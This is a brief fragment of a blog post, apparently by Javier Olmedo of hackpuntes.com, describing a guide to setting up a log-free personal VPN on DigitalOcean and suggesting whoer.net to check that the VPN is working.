<p>We can use <a href="https://whoer.net">WHOER</a> to find out information and confirm the use of our VPN.</p>Javier Olmedocontacto@hackpuntes.comHaving a log-free personal VPN allows you to maintain an acceptable level of anonymity and privacy on the network, this post will show you how to configure one with DigitalOcean.